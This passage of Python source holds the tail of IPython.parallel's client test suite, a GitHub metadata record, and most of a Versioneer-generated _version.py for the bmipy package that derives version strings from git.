        v = self.client[t]
        self.assertTrue(isinstance(v, DirectView))
        self.assertEqual(v.targets, t)
        v = self.client[::2]
        self.assertTrue(isinstance(v, DirectView))
        self.assertEqual(v.targets, targets[::2])
        v = self.client[1::3]
        self.assertTrue(isinstance(v, DirectView))
        self.assertEqual(v.targets, targets[1::3])
        v = self.client[:-3]
        self.assertTrue(isinstance(v, DirectView))
        self.assertEqual(v.targets, targets[:-3])
        v = self.client[-1]
        self.assertTrue(isinstance(v, DirectView))
        self.assertEqual(v.targets, targets[-1])
        self.assertRaises(TypeError, lambda : self.client[None])
    def test_lbview_targets(self):
        """test load_balanced_view targets"""
        v = self.client.load_balanced_view()
        self.assertEqual(v.targets, None)
        v = self.client.load_balanced_view(-1)
        self.assertEqual(v.targets, [self.client.ids[-1]])
        v = self.client.load_balanced_view('all')
        self.assertEqual(v.targets, None)
    def test_dview_targets(self):
        """test direct_view targets"""
        v = self.client.direct_view()
        self.assertEqual(v.targets, 'all')
        v = self.client.direct_view('all')
        self.assertEqual(v.targets, 'all')
        v = self.client.direct_view(-1)
        self.assertEqual(v.targets, self.client.ids[-1])
    def test_lazy_all_targets(self):
        """test lazy evaluation of rc.direct_view('all')"""
        v = self.client.direct_view()
        self.assertEqual(v.targets, 'all')
        def double(x):
            return x*2
        seq = list(range(100))
        ref = [ double(x) for x in seq ]
        # add some engines, which should be used
        self.add_engines(1)
        n1 = len(self.client.ids)
        # simple apply
        r = v.apply_sync(lambda : 1)
        self.assertEqual(r, [1] * n1)
        # map goes through remotefunction
        r = v.map_sync(double, seq)
        self.assertEqual(r, ref)
        # add a couple more engines, and try again
        self.add_engines(2)
        n2 = len(self.client.ids)
        self.assertNotEqual(n2, n1)
        # apply
        r = v.apply_sync(lambda : 1)
        self.assertEqual(r, [1] * n2)
        # map
        r = v.map_sync(double, seq)
        self.assertEqual(r, ref)
    def test_targets(self):
        """test various valid targets arguments"""
        build = self.client._build_targets
        ids = self.client.ids
        idents,targets = build(None)
        self.assertEqual(ids, targets)
    def test_clear(self):
        """test clear behavior"""
        self.minimum_engines(2)
        v = self.client[:]
        v.block=True
        v.push(dict(a=5))
        v.pull('a')
        id0 = self.client.ids[-1]
        self.client.clear(targets=id0, block=True)
        # 'a' survives everywhere except the cleared engine.
        a = self.client[:-1].get('a')
        self.assertRaisesRemote(NameError, self.client[id0].get, 'a')
        self.client.clear(block=True)
        for i in self.client.ids:
            self.assertRaisesRemote(NameError, self.client[i].get, 'a')
    def test_get_result(self):
        """test getting results from the Hub."""
        c = clientmod.Client(profile='iptest')
        t = c.ids[-1]
        ar = c[t].apply_async(wait, 1)
        # give the monitor time to notice the message
        time.sleep(.25)
        ahr = self.client.get_result(ar.msg_ids[0])
        self.assertTrue(isinstance(ahr, AsyncHubResult))
        self.assertEqual(ahr.get(), ar.get())
        ar2 = self.client.get_result(ar.msg_ids[0])
        self.assertFalse(isinstance(ar2, AsyncHubResult))
        c.close()
    def test_get_execute_result(self):
        """test getting execute results from the Hub."""
        c = clientmod.Client(profile='iptest')
        t = c.ids[-1]
        # NOTE(review): `cell` is built but never used below — confirm intent.
        cell = '\n'.join([
            'import time',
            'time.sleep(0.25)',
            '5'
        ])
        ar = c[t].execute("import time; time.sleep(1)", silent=False)
        # give the monitor time to notice the message
        time.sleep(.25)
        ahr = self.client.get_result(ar.msg_ids[0])
        self.assertTrue(isinstance(ahr, AsyncHubResult))
        self.assertEqual(ahr.get().pyout, ar.get().pyout)
        ar2 = self.client.get_result(ar.msg_ids[0])
        self.assertFalse(isinstance(ar2, AsyncHubResult))
        c.close()
    def test_ids_list(self):
        """test client.ids"""
        ids = self.client.ids
        self.assertEqual(ids, self.client._ids)
        # client.ids must be a copy, not the internal list itself.
        self.assertFalse(ids is self.client._ids)
        ids.remove(ids[-1])
        self.assertNotEqual(ids, self.client._ids)
    def test_queue_status(self):
        ids = self.client.ids
        id0 = ids[0]
        qs = self.client.queue_status(targets=id0)
        self.assertTrue(isinstance(qs, dict))
        self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
        allqs = self.client.queue_status()
        self.assertTrue(isinstance(allqs, dict))
        intkeys = list(allqs.keys())
        intkeys.remove('unassigned')
        print("intkeys", intkeys)
        intkeys = sorted(intkeys)
        ids = self.client.ids
        print("client.ids", ids)
        ids = sorted(self.client.ids)
        self.assertEqual(intkeys, ids)
        unassigned = allqs.pop('unassigned')
        for eid,qs in allqs.items():
            self.assertTrue(isinstance(qs, dict))
            self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
    def test_shutdown(self):
        ids = self.client.ids
        id0 = ids[0]
        self.client.shutdown(id0, block=True)
        # Poll until the Hub drops the engine from the registry.
        while id0 in self.client.ids:
            time.sleep(0.1)
            self.client.spin()
        self.assertRaises(IndexError, lambda : self.client[id0])
    def test_result_status(self):
        pass
        # to be written
    def test_db_query_dt(self):
        """test db query by date"""
        hist = self.client.hub_history()
        middle = self.client.db_query({'msg_id' : hist[len(hist)//2]})[0]
        tic = middle['submitted']
        before = self.client.db_query({'submitted' : {'$lt' : tic}})
        after = self.client.db_query({'submitted' : {'$gte' : tic}})
        self.assertEqual(len(before)+len(after),len(hist))
        for b in before:
            self.assertTrue(b['submitted'] < tic)
        for a in after:
            self.assertTrue(a['submitted'] >= tic)
        same = self.client.db_query({'submitted' : tic})
        for s in same:
            self.assertTrue(s['submitted'] == tic)
    def test_db_query_keys(self):
        """test extracting subset of record keys"""
        found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
        for rec in found:
            self.assertEqual(set(rec.keys()), set(['msg_id', 'submitted', 'completed']))
    def test_db_query_default_keys(self):
        """default db_query excludes buffers"""
        found = self.client.db_query({'msg_id': {'$ne' : ''}})
        for rec in found:
            keys = set(rec.keys())
            self.assertFalse('buffers' in keys, "'buffers' should not be in: %s" % keys)
            self.assertFalse('result_buffers' in keys, "'result_buffers' should not be in: %s" % keys)
    def test_db_query_msg_id(self):
        """ensure msg_id is always in db queries"""
        found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
        for rec in found:
            self.assertTrue('msg_id' in rec.keys())
        found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted'])
        for rec in found:
            self.assertTrue('msg_id' in rec.keys())
        found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['msg_id'])
        for rec in found:
            self.assertTrue('msg_id' in rec.keys())
    def test_db_query_get_result(self):
        """pop in db_query shouldn't pop from result itself"""
        self.client[:].apply_sync(lambda : 1)
        found = self.client.db_query({'msg_id': {'$ne' : ''}})
        rc2 = clientmod.Client(profile='iptest')
        # If this bug is not fixed, this call will hang:
        ar = rc2.get_result(self.client.history[-1])
        ar.wait(2)
        self.assertTrue(ar.ready())
        ar.get()
        rc2.close()
    def test_db_query_in(self):
        """test db query with '$in','$nin' operators"""
        hist = self.client.hub_history()
        even = hist[::2]
        odd = hist[1::2]
        recs = self.client.db_query({ 'msg_id' : {'$in' : even}})
        found = [ r['msg_id'] for r in recs ]
        self.assertEqual(set(even), set(found))
        recs = self.client.db_query({ 'msg_id' : {'$nin' : even}})
        found = [ r['msg_id'] for r in recs ]
        self.assertEqual(set(odd), set(found))
    def test_hub_history(self):
        hist = self.client.hub_history()
        recs = self.client.db_query({ 'msg_id' : {"$ne":''}})
        recdict = {}
        for rec in recs:
            recdict[rec['msg_id']] = rec
        # hub_history should be ordered by submission time, oldest first.
        latest = datetime(1984,1,1)
        for msg_id in hist:
            rec = recdict[msg_id]
            newt = rec['submitted']
            self.assertTrue(newt >= latest)
            latest = newt
        ar = self.client[-1].apply_async(lambda : 1)
        ar.get()
        time.sleep(0.25)
        self.assertEqual(self.client.hub_history()[-1:],ar.msg_ids)
    def _wait_for_idle(self):
        """wait for the cluster to become idle, according to the everyone."""
        rc = self.client
        # step 0. wait for local results
        # this should be sufficient 99% of the time.
        rc.wait(timeout=5)
        # step 1. wait for all requests to be noticed
        # timeout 5s, polling every 100ms
        msg_ids = set(rc.history)
        hub_hist = rc.hub_history()
        for i in range(50):
            if msg_ids.difference(hub_hist):
                time.sleep(0.1)
                hub_hist = rc.hub_history()
            else:
                break
        self.assertEqual(len(msg_ids.difference(hub_hist)), 0)
        # step 2. wait for all requests to be done
        # timeout 5s, polling every 100ms
        qs = rc.queue_status()
        for i in range(50):
            if qs['unassigned'] or any(qs[eid]['tasks'] + qs[eid]['queue'] for eid in qs if eid != 'unassigned'):
                time.sleep(0.1)
                qs = rc.queue_status()
            else:
                break
        # ensure Hub up to date:
        self.assertEqual(qs['unassigned'], 0)
        for eid in [ eid for eid in qs if eid != 'unassigned' ]:
            self.assertEqual(qs[eid]['tasks'], 0)
            self.assertEqual(qs[eid]['queue'], 0)
    def test_resubmit(self):
        def f():
            import random
            return random.random()
        v = self.client.load_balanced_view()
        ar = v.apply_async(f)
        r1 = ar.get(1)
        # give the Hub a chance to notice:
        self._wait_for_idle()
        ahr = self.client.resubmit(ar.msg_ids)
        r2 = ahr.get(1)
        self.assertFalse(r1 == r2)
    def test_resubmit_chain(self):
        """resubmit resubmitted tasks"""
        v = self.client.load_balanced_view()
        ar = v.apply_async(lambda x: x, 'x'*1024)
        ar.get()
        self._wait_for_idle()
        ars = [ar]
        # NOTE(review): `ars` is never extended and `ar2` is unused, so this
        # loop resubmits the same original task 10 times rather than chaining
        # resubmissions — confirm whether `ars.append(ar2)` was intended.
        for i in range(10):
            ar = ars[-1]
            ar2 = self.client.resubmit(ar.msg_ids)
        [ ar.get() for ar in ars ]
    def test_resubmit_header(self):
        """resubmit shouldn't clobber the whole header"""
        def f():
            import random
            return random.random()
        v = self.client.load_balanced_view()
        v.retries = 1
        ar = v.apply_async(f)
        r1 = ar.get(1)
        # give the Hub a chance to notice:
        self._wait_for_idle()
        ahr = self.client.resubmit(ar.msg_ids)
        ahr.get(1)
        time.sleep(0.5)
        records = self.client.db_query({'msg_id': {'$in': ar.msg_ids + ahr.msg_ids}}, keys='header')
        h1,h2 = [ r['header'] for r in records ]
        for key in set(h1.keys()).union(set(h2.keys())):
            if key in ('msg_id', 'date'):
                self.assertNotEqual(h1[key], h2[key])
            else:
                self.assertEqual(h1[key], h2[key])
    def test_resubmit_aborted(self):
        def f():
            import random
            return random.random()
        v = self.client.load_balanced_view()
        # restrict to one engine, so we can put a sleep
        # ahead of the task, so it will get aborted
        eid = self.client.ids[-1]
        v.targets = [eid]
        sleep = v.apply_async(time.sleep, 0.5)
        ar = v.apply_async(f)
        ar.abort()
        self.assertRaises(error.TaskAborted, ar.get)
        # Give the Hub a chance to get up to date:
        self._wait_for_idle()
        ahr = self.client.resubmit(ar.msg_ids)
        r2 = ahr.get(1)
    def test_resubmit_inflight(self):
        """resubmit of inflight task"""
        v = self.client.load_balanced_view()
        ar = v.apply_async(time.sleep,1)
        # give the message a chance to arrive
        time.sleep(0.2)
        ahr = self.client.resubmit(ar.msg_ids)
        ar.get(2)
        ahr.get(2)
    def test_resubmit_badkey(self):
        """ensure KeyError on resubmit of nonexistant task"""
        self.assertRaisesRemote(KeyError, self.client.resubmit, ['invalid'])
    def test_purge_hub_results(self):
        # ensure there are some tasks
        for i in range(5):
            self.client[:].apply_sync(lambda : 1)
        # Wait for the Hub to realise the result is done:
        # This prevents a race condition, where we
        # might purge a result the Hub still thinks is pending.
        self._wait_for_idle()
        rc2 = clientmod.Client(profile='iptest')
        hist = self.client.hub_history()
        ahr = rc2.get_result([hist[-1]])
        ahr.wait(10)
        self.client.purge_hub_results(hist[-1])
        newhist = self.client.hub_history()
        self.assertEqual(len(newhist)+1,len(hist))
        rc2.spin()
        rc2.close()
    def test_purge_local_results(self):
        # ensure there are some tasks
        res = []
        for i in range(5):
            res.append(self.client[:].apply_async(lambda : 1))
        self._wait_for_idle()
        self.client.wait(10) # wait for the results to come back
        before = len(self.client.results)
        self.assertEqual(len(self.client.metadata),before)
        self.client.purge_local_results(res[-1])
        self.assertEqual(len(self.client.results),before-len(res[-1]), msg="Not removed from results")
        self.assertEqual(len(self.client.metadata),before-len(res[-1]), msg="Not removed from metadata")
    def test_purge_local_results_outstanding(self):
        v = self.client[-1]
        ar = v.apply_async(lambda : 1)
        msg_id = ar.msg_ids[0]
        ar.get()
        self._wait_for_idle()
        ar2 = v.apply_async(time.sleep, 1)
        self.assertIn(msg_id, self.client.results)
        self.assertIn(msg_id, self.client.metadata)
        self.client.purge_local_results(ar)
        self.assertNotIn(msg_id, self.client.results)
        self.assertNotIn(msg_id, self.client.metadata)
        # Purging an outstanding (unfinished) result must be refused.
        with self.assertRaises(RuntimeError):
            self.client.purge_local_results(ar2)
        ar2.get()
        self.client.purge_local_results(ar2)
    def test_purge_all_local_results_outstanding(self):
        v = self.client[-1]
        ar = v.apply_async(time.sleep, 1)
        with self.assertRaises(RuntimeError):
            self.client.purge_local_results('all')
        ar.get()
        self.client.purge_local_results('all')
    def test_purge_all_hub_results(self):
        self.client.purge_hub_results('all')
        hist = self.client.hub_history()
        self.assertEqual(len(hist), 0)
    def test_purge_all_local_results(self):
        self.client.purge_local_results('all')
        self.assertEqual(len(self.client.results), 0, msg="Results not empty")
        self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
    def test_purge_all_results(self):
        # ensure there are some tasks
        for i in range(5):
            self.client[:].apply_sync(lambda : 1)
        self.client.wait(10)
        self._wait_for_idle()
        self.client.purge_results('all')
        self.assertEqual(len(self.client.results), 0, msg="Results not empty")
        self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
        hist = self.client.hub_history()
        self.assertEqual(len(hist), 0, msg="hub history not empty")
    def test_purge_everything(self):
        # ensure there are some tasks
        for i in range(5):
            self.client[:].apply_sync(lambda : 1)
        self.client.wait(10)
        self._wait_for_idle()
        self.client.purge_everything()
        # The client results
        self.assertEqual(len(self.client.results), 0, msg="Results not empty")
        self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
        # The client "bookkeeping"
        self.assertEqual(len(self.client.session.digest_history), 0, msg="session digest not empty")
        self.assertEqual(len(self.client.history), 0, msg="client history not empty")
        # the hub results
        hist = self.client.hub_history()
        self.assertEqual(len(hist), 0, msg="hub history not empty")
    def test_spin_thread(self):
        self.client.spin_thread(0.01)
        ar = self.client[-1].apply_async(lambda : 1)
        md = self.client.metadata[ar.msg_ids[0]]
        # 3s timeout, 100ms poll
        for i in range(30):
            time.sleep(0.1)
            if md['received'] is not None:
                break
        self.assertIsInstance(md['received'], datetime)
    def test_stop_spin_thread(self):
        self.client.spin_thread(0.01)
        self.client.stop_spin_thread()
        ar = self.client[-1].apply_async(lambda : 1)
        md = self.client.metadata[ar.msg_ids[0]]
        # 500ms timeout, 100ms poll
        for i in range(5):
            time.sleep(0.1)
            # NOTE(review): the second argument here is assertIsNone's `msg`
            # parameter; passing None is harmless but probably unintended.
            self.assertIsNone(md['received'], None)
    def test_activate(self):
        # get_ipython() is provided by the IPython test environment.
        ip = get_ipython()
        magics = ip.magics_manager.magics
        self.assertTrue('px' in magics['line'])
        self.assertTrue('px' in magics['cell'])
        v0 = self.client.activate(-1, '0')
        self.assertTrue('px0' in magics['line'])
        self.assertTrue('px0' in magics['cell'])
        self.assertEqual(v0.targets, self.client.ids[-1])
        v0 = self.client.activate('all', 'all')
        self.assertTrue('pxall' in magics['line'])
        self.assertTrue('pxall' in magics['cell'])
        self.assertEqual(v0.targets, 'all')
| {
"content_hash": "5d7909d047145d1dc3a1d7a272ae34bc",
"timestamp": "",
"source": "github",
"line_count": 555,
"max_line_length": 113,
"avg_line_length": 37.14054054054054,
"alnum_prop": 0.56173288701305,
"repo_name": "EricCline/CEM_inc",
"id": "06aefd303b480b525708d27fd38cac0021c37054",
"size": "20613",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/IPython/parallel/tests/test_client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "124610"
},
{
"name": "JavaScript",
"bytes": "2188363"
},
{
"name": "Python",
"bytes": "9913298"
},
{
"name": "Shell",
"bytes": "3677"
}
],
"symlink_target": ""
} |
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
    """Get the keywords needed to look up the version information."""
    # These literal "$Format:...$" strings are expanded by git during
    # git-archive. setup.py/versioneer.py greps for the variable names, so
    # each assignment must stay on its own line with its original name.
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    git_date = "$Format:%ci$"
    return {"refnames": git_refnames, "full": git_full, "date": git_date}
class VersioneerConfig:
    """Container for Versioneer configuration parameters."""


def get_config():
    """Create, populate and return the VersioneerConfig() object."""
    # These values were baked in when 'setup.py versioneer' generated
    # _version.py for the bmipy project.
    cfg = VersioneerConfig()
    for attr, value in (
        ("VCS", "git"),
        ("style", "pep440"),
        ("tag_prefix", ""),
        ("parentdir_prefix", "bmipy-"),
        ("versionfile_source", "bmipy/_version.py"),
        ("verbose", False),
    ):
        setattr(cfg, attr, value)
    return cfg
# Raised by version-discovery strategies to signal "try the next method".
class NotThisMethod(Exception):
    """Exception raised if a method is not valid for the current scenario."""
# Registry of long _version.py templates, keyed by VCS name.
LONG_VERSION_PY = {}
# Registry of handler callables: HANDLERS[vcs][method] -> function.
HANDLERS = {}


def register_vcs_handler(vcs, method):  # decorator
    """Decorator to mark a method as the handler for a particular VCS."""
    def decorate(f):
        """Store f in HANDLERS[vcs][method]."""
        HANDLERS.setdefault(vcs, {})[method] = f
        return f
    return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
    """Run the first launchable command name in *commands* with *args*.

    Returns a (stdout, returncode) tuple.  stdout is None when no command
    could be launched or when the command exited non-zero (returncode is
    then None or the non-zero exit status respectively).
    """
    assert isinstance(commands, list)
    process = None
    display = None
    for candidate in commands:
        display = str([candidate] + args)
        try:
            # remember shell=False, so use git.cmd on windows, not just git
            process = subprocess.Popen(
                [candidate] + args,
                cwd=cwd,
                env=env,
                stdout=subprocess.PIPE,
                stderr=(subprocess.PIPE if hide_stderr else None),
            )
        except EnvironmentError:
            err = sys.exc_info()[1]
            if err.errno == errno.ENOENT:
                continue  # this name does not exist; try the next candidate
            if verbose:
                print("unable to run %s" % display)
                print(err)
            return None, None
        break
    else:
        # Loop finished without a successful Popen: nothing was launchable.
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None, None
    stdout = process.communicate()[0].strip()
    if sys.version_info[0] >= 3:
        stdout = stdout.decode()
    if process.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % display)
            print("stdout was %s" % stdout)
        return None, process.returncode
    return stdout, process.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Try to determine the version from the parent directory name.

    Source tarballs conventionally unpack into a directory that includes
    both the project name and a version string.  Also searches up to two
    additional parent-directory levels for a suitably named directory.
    """
    tried = []
    for _ in range(3):
        basename = os.path.basename(root)
        if basename.startswith(parentdir_prefix):
            return {
                "version": basename[len(parentdir_prefix):],
                "full-revisionid": None,
                "dirty": False,
                "error": None,
                "date": None,
            }
        tried.append(root)
        root = os.path.dirname(root)  # walk up one level
    if verbose:
        print(
            "Tried directories %s but none started with prefix %s"
            % (str(tried), parentdir_prefix)
        )
    raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
    """Extract version information from the given file.

    The code embedded in _version.py can just fetch the value of these
    keywords.  When used from setup.py, we don't want to import _version.py,
    so we do it with a regexp instead.  This function is not used from
    _version.py.

    Returns a dict holding whichever of "refnames", "full" and "date" were
    found; a missing or unreadable file yields an empty dict.
    """
    keywords = {}
    # Map the assignment prefix in the file to the key it is stored under.
    fields = {
        "git_refnames =": "refnames",
        "git_full =": "full",
        "git_date =": "date",
    }
    try:
        # 'with' guarantees the handle is closed even if reading raises
        # (the original leaked the handle on any non-EnvironmentError).
        with open(versionfile_abs, "r") as f:
            for line in f:
                for prefix, key in fields.items():
                    if line.strip().startswith(prefix):
                        mo = re.search(r'=\s*"(.*)"', line)
                        if mo:
                            keywords[key] = mo.group(1)
    except EnvironmentError:
        # File missing/unreadable: return whatever was collected (nothing).
        pass
    return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
    """Get version information from git-archive expanded keywords.

    Raises NotThisMethod when *keywords* is empty or still unexpanded.
    """
    if not keywords:
        raise NotThisMethod("no keywords at all, weird")
    date = keywords.get("date")
    if date is not None:
        # git-2.2.0 added "%cI" (strict ISO-8601), but "%ci" has been around
        # since git-1.5.3 and is close enough: turn the first space into "T"
        # and drop the space before the timezone offset to make it compliant.
        date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
    refnames = keywords["refnames"].strip()
    if refnames.startswith("$Format"):
        if verbose:
            print("keywords are unexpanded, not using")
        raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
    refs = {ref.strip() for ref in refnames.strip("()").split(",")}
    # Starting in git-1.8.3 tags are listed as "tag: foo-1.0" instead of just
    # "foo-1.0"; when a "tag: " prefix is present, prefer those entries.
    TAG = "tag: "
    tags = {ref[len(TAG):] for ref in refs if ref.startswith(TAG)}
    if not tags:
        # Either git < 1.8.3, or there really are no tags.  Heuristic: assume
        # version tags contain a digit, which filters out branch names like
        # "release" or "stabilization" as well as "HEAD" and "master".
        tags = {ref for ref in refs if re.search(r"\d", ref)}
        if verbose:
            print("discarding '%s', no digits" % ",".join(refs - tags))
    if verbose:
        print("likely tags: %s" % ",".join(sorted(tags)))
    for ref in sorted(tags):
        # sorting prefers e.g. "2.0" over "2.0rc1"
        if not ref.startswith(tag_prefix):
            continue
        version = ref[len(tag_prefix):]
        if verbose:
            print("picking %s" % version)
        return {
            "version": version,
            "full-revisionid": keywords["full"].strip(),
            "dirty": False,
            "error": None,
            "date": date,
        }
    # No suitable tag: version is "0+unknown" but the full hex is still there.
    if verbose:
        print("no suitable tags, using unknown + full revision id")
    return {
        "version": "0+unknown",
        "full-revisionid": keywords["full"].strip(),
        "dirty": False,
        "error": "no suitable tags",
        "date": None,
    }
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
    """Get version from 'git describe' in the root of the source tree.

    This only gets called if the git-archive 'subst' keywords were *not*
    expanded, and _version.py hasn't already been rewritten with a short
    version string, meaning we're inside a checked out source tree.

    Returns a "pieces" dict with keys long, short, error, dirty,
    closest-tag, distance and date.  Raises NotThisMethod when *root* is
    not under git control or the git commands fail outright.
    """
    GITS = ["git"]
    if sys.platform == "win32":
        # run_command uses shell=False, so the Windows wrappers must be
        # named explicitly.
        GITS = ["git.cmd", "git.exe"]
    out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
    if rc != 0:
        if verbose:
            print("Directory %s not under git control" % root)
        raise NotThisMethod("'git rev-parse --git-dir' returned error")
    # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
    # if there isn't one, this yields HEX[-dirty] (no NUM)
    describe_out, rc = run_command(
        GITS,
        [
            "describe",
            "--tags",
            "--dirty",
            "--always",
            "--long",
            "--match",
            "%s*" % tag_prefix,
        ],
        cwd=root,
    )
    # --long was added in git-1.5.5
    if describe_out is None:
        raise NotThisMethod("'git describe' failed")
    describe_out = describe_out.strip()
    full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
    if full_out is None:
        raise NotThisMethod("'git rev-parse' failed")
    full_out = full_out.strip()
    pieces = {}
    pieces["long"] = full_out
    pieces["short"] = full_out[:7]  # maybe improved later
    pieces["error"] = None
    # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
    # TAG might have hyphens.
    git_describe = describe_out
    # look for -dirty suffix
    dirty = git_describe.endswith("-dirty")
    pieces["dirty"] = dirty
    if dirty:
        git_describe = git_describe[: git_describe.rindex("-dirty")]
    # now we have TAG-NUM-gHEX or HEX
    if "-" in git_describe:
        # TAG-NUM-gHEX
        mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
        if not mo:
            # unparseable. Maybe git-describe is misbehaving?
            pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
            return pieces
        # tag
        full_tag = mo.group(1)
        if not full_tag.startswith(tag_prefix):
            if verbose:
                fmt = "tag '%s' doesn't start with prefix '%s'"
                print(fmt % (full_tag, tag_prefix))
            pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
                full_tag,
                tag_prefix,
            )
            return pieces
        pieces["closest-tag"] = full_tag[len(tag_prefix) :]
        # distance: number of commits since tag
        pieces["distance"] = int(mo.group(2))
        # commit: short hex revision ID
        pieces["short"] = mo.group(3)
    else:
        # HEX: no tags
        pieces["closest-tag"] = None
        count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
        pieces["distance"] = int(count_out)  # total number of commits
    # commit date: see ISO-8601 comment in git_versions_from_keywords()
    date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[
        0
    ].strip()
    pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
    return pieces
def plus_or_dot(pieces):
    """Return a "+" if we don't already have one, else return a ".".

    PEP 440 local version segments start with "+"; subsequent parts are
    separated by ".".  Treats a missing *or None* "closest-tag" as empty,
    so callers need not guard (the original raised TypeError when the key
    was present but None).
    """
    tag = pieces.get("closest-tag") or ""
    return "." if "+" in tag else "+"
def render_pep440(pieces):
    """Build up version string, with post-release "local version identifier".

    Our goal: TAG[+DISTANCE.gHEX[.dirty]].  Note that if you get a tagged
    build and then dirty it, you'll get TAG+0.gHEX.dirty.

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    dirty_suffix = ".dirty" if pieces["dirty"] else ""
    if not pieces["closest-tag"]:
        # exception #1: no tag at all
        return "0+untagged.%d.g%s%s" % (
            pieces["distance"], pieces["short"], dirty_suffix)
    rendered = pieces["closest-tag"]
    if pieces["distance"] or pieces["dirty"]:
        rendered += "%s%d.g%s%s" % (
            plus_or_dot(pieces), pieces["distance"], pieces["short"], dirty_suffix)
    return rendered
def render_pep440_pre(pieces):
    """TAG[.post.devDISTANCE] -- No -dirty.

    Exceptions:
    1: no tags. 0.post.devDISTANCE
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1
        return "0.post.dev%d" % pieces["distance"]
    if not pieces["distance"]:
        return tag
    return tag + ".post.dev%d" % pieces["distance"]
def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .

    The ".dev0" means dirty.  Note that .dev0 sorts backwards (a dirty tree
    appears "older" than the corresponding clean one), but you shouldn't be
    releasing software with -dirty anyways.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                rendered += ".dev0"
            rendered += "%sg%s" % (plus_or_dot(pieces), pieces["short"])
        return rendered
    # exception #1: no tag at all
    rendered = "0.post%d" % pieces["distance"]
    if pieces["dirty"]:
        rendered += ".dev0"
    return rendered + "+g%s" % pieces["short"]
def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .

    The ".dev0" means dirty.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if not (pieces["distance"] or pieces["dirty"]):
            return rendered
        rendered += ".post%d" % pieces["distance"]
    else:
        # exception #1
        rendered = "0.post%d" % pieces["distance"]
    if pieces["dirty"]:
        rendered += ".dev0"
    return rendered
def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].

    Like 'git describe --tags --dirty --always'.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        rendered = tag
        if pieces["distance"]:
            rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1
        rendered = pieces["short"]
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered
def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].

    Like 'git describe --tags --dirty --always -long'.
    The distance/hash is unconditional.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    rendered = (
        "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
        if tag
        else pieces["short"]  # exception #1
    )
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered
def render(pieces, style):
    """Render the given version pieces into the requested style."""
    if pieces["error"]:
        return {
            "version": "unknown",
            "full-revisionid": pieces.get("long"),
            "dirty": None,
            "error": pieces["error"],
            "date": None,
        }
    if not style or style == "default":
        style = "pep440"  # the default
    # Dispatch table built after the error check so error-only callers never
    # touch the renderer functions.
    renderers = {
        "pep440": render_pep440,
        "pep440-pre": render_pep440_pre,
        "pep440-post": render_pep440_post,
        "pep440-old": render_pep440_old,
        "git-describe": render_git_describe,
        "git-describe-long": render_git_describe_long,
    }
    renderer = renderers.get(style)
    if renderer is None:
        raise ValueError("unknown style '%s'" % style)
    return {
        "version": renderer(pieces),
        "full-revisionid": pieces["long"],
        "dirty": pieces["dirty"],
        "error": None,
        "date": pieces.get("date"),
    }
def get_versions():
    """Get version information or return default if unable to do so."""
    # We are in _version.py, which lives at ROOT/VERSIONFILE_SOURCE.  If we
    # have __file__ we can work backwards to find ROOT; py2exe/bbfreeze and
    # some non-CPython implementations lack __file__, in which case only
    # expanded keywords can be used.
    cfg = get_config()
    verbose = cfg.verbose

    try:
